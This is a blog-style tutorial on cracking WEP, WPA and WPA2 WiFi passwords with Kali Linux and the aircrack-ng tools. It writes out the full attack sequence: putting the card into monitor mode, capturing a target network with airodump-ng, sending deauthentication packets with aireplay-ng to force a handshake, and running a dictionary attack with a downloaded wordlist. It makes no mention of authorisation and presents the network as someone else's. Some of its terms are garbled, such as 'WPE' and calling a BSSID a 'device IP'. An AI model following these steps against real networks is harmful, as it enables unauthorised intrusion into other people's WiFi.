How to Hack WPE, WPA and WPA2 WiFi Password using Kali Linux and Windows, and Using airmon-ng, aircrack-ng and airodump-ng tools.

What do you Need to hack wifi password?

  1. One kali Linux Bootable Pen drive
  2. One PC/Laptop based on Windows 10, 08, 07
  3. ome knowledge of Windows Operating System and Linux Operating System.
  4. Get Wi-Fi frequency high
  5. Knowledge of Aircrack-ng Tools
  6. Wordlist

One kali Linux Bootable Pen drive

Why you need Kali Linux bootable pendrive?
Because Kali Linux supported all Wi-Fi tools like- Airmon-ng, Airodump-ng and Aircrack-ng. And the main thing is that it supports Wi-Fi monitoring and Kali Linux was originally developed only for hacking.

One PC/Laptop based on Windows 10, 08, 07.

Why you need PC/Laptop based on Windows 10, 08, 07?
Because you need PC/Laptop based on windows 10, 08 etc to run Kali Linux operating system and Aircracl-ng GUI Tools.

Some knowledge of Windows Operating System and Linux Operating System.

If you have some knowledge of Windows Operating System and Linux Operating System, then you can teach this method very well and easily, If you do not have knowledge of Linux OS, then it does not matter, you remained with me and you followed my steps.

Get WiFi frequency high.

Why get Wi-Fi frequency high?
If your frequency of Wi-Fi is not high, then you may have difficulty in monitoring the Wi-Fi, due to which you will not be able to capture Hand Shake properly. If once you have captured Hand Shake then after that you can go away.

Knowledge of Aircrack-ng Tools.

Aircrack-ng is a tool to assess Wi-Fi network security. Aircrack-ng Monitoring Packet capture and export of data. Aircrack-ng Attacking de-authentication, Replay attacks and fake access points. And Checking Wi-Fi cards and driver capabilities and Cracking WEP, WPA, WPA2 and PSK Wi-Fi Security.
Go to the Aircrack official website https://www.aircrack-ng.org/ and download Aircrack-ng GUI tools for your related operating systems.

Wordlist

A wordlist is a content document containing an assortment of words for use in a dictionary attack.
Download 1.1 Million word list Click hear.
And your extract password is:- technical-education.com
Note:- Follow all the steps given above, then after that you follow the next steps, if you do not follow the above steps or do not read it and you come directly to the steps below, then you will know that you will do a Wi-Fi hacked, but you will not have his knowledge because you are a script kiddie and not a hacker. A hacker has knowledge of everything and what is said and how it is happening. Please read all above steps carefully for your better knowledge and experience.

How to Hack WiFi Password

Let's go started

Boot your Kali Linux

Insert your Pen drive on your Laptop/PC. Then restart your Laptop/PC. Then press Esc and look your boot menu is open, Select your Pen drive (PD). Then your PD booting process has been started, you can wait a few minutes. Then select Live's (first option)
Insert Pen drive
 
Restart Laptop/PC


 Boot Menu

 Select Live's
 

Open your Terminal

 Types "ifconfig" because check your terminal working or not.


Type your 1st command

airmon-ng

 

Type your 2nd command

  • airmon-ng check kill
  • airmon-ng start wlan0

Type your 3rd command airodump-ng wlan0mon

Type your 4th command

  • airodump-ng --bssid D4:76.......B5 -c 1 -w /root/Desktop/wifi wlan0mon
Note:- --bssid (device IP) is a different - different based on your WiFi divices. -c (chainals) is a different , so select carefully.

Type your 5th command

Open new terminal and types.
aireplay-ng --deauth 20 -a D4:76.......B5 wlan0mon
Capture Handshake files and copy this files and go to the windows.

 Capture Handshake


Copy captures handshake files.

Next step:- Open Windows

Go to your Windows operating systems. Install Aircrack-ng GUI tools and open it.
Choose your capture file .cap and Wordlist. Then hit Launch button
 Wait few times.

Great; Key was Found. Enjoy it...

Read Digital Marketing in World Stream SEO  
 
Use My Notes is an Educational Website for providing all Technical course material. 

Post a Comment

Previous Post Next Post